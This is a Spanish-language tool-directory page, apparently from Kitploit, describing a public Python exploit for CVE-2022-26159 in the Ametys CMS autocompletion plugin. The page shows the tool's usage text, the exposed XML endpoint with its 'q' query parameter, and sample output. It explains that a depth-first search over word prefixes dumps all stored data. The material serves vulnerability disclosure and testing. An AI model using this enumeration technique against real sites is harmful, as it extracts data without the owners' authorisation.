Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26159-Ametys-Autocompletion-XML — Un exploit de Python para volcar automáticamente todos los datos almacenados por el plugin de autocompletado de Ametys CMS a un archivo de base de datos sqlite local. | Kitploit
Herramientas/GitHubGitHub/p0dalirius/cve-2022-26159-ametys-autocompletion-xml
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosRecopilación de InformaciónCrawler
GitHubp0dalirius/cve-2022-26159-ametys-autocompletion-xml

CVE-2022-26159-Ametys-Autocompletion-XML

Un exploit de Python para volcar automáticamente todos los datos almacenados por el plugin de autocompletado de Ametys CMS a un archivo de base de datos sqlite local.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver RepositorioSitio web
143hace 4 añosAún no revisado

CVE-2022-26159-Ametys-Autocompletion-XML

Un exploit en Python para volcar automáticamente todos los datos almacenados por el plugin de autocompletado de Ametys CMS en un archivo de base de datos sqlite local.
GitHub release (latest by date) YouTube Channel Subscribers

Features

  • Detección automática del número máximo de resultados devueltos por el plugin de autocompletado.
  • Búsqueda en profundidad para volcar todos los resultados.
  • Archivo de registro de salida.

Usage

root@kitploit:~
$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -h
CVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podalirius

usage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        arg1 help message
  -H HEADERS, --header HEADERS
                        Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")
  -k, --insecure        Disable SSL/TLS warnings and certificate verification.
  -v, --verbose         Verbose mode. (default: False)
  -q, --quiet           Quiet mode. (default: False)
  --no-colors           Disables colored output. (default: False)

Technical details

El plugin de autocompletado de Ametys CMS <= 4.4.9 expone públicamente un archivo XML que contiene una lista de palabras en la siguiente dirección:

root@kitploit:~
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml

Para realizar una petición a esta base de datos, un atacante solo necesita escribir el comienzo de la palabra en el parámetro q (query):

root@kitploit:~
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm

Y el plugin de autocompletado devuelve las primeras 10 palabras coincidentes que empiezan por adm (de la consulta) en un archivo XML:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<auto-completion>
    <item>administrateur</item>
    <item>administrateurs</item>
    <item>administratif</item>
    <item>administratifs</item>
    <item>administration</item>
    <item>administrations</item>
    <item>administrative</item>
    <item>administratives</item>
    <item>administres</item>
    <item>admission</item>
</auto-completion>

Teniendo esto en cuenta, un atacante solo necesita realizar una búsqueda en profundidad en la API para extraer todo su contenido.

Contributing

Las pull requests son bienvenidas. No dudes en abrir un issue si quieres añadir otras funcionalidades.

References

  • https://podalirius.net/en/cves/2022-26159/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26159
  • https://issues.ametys.org/browse/CMS-10973
  • https://podalirius.net/en/articles/scraping-search-apis-depth-first-style/
Descargar herramienta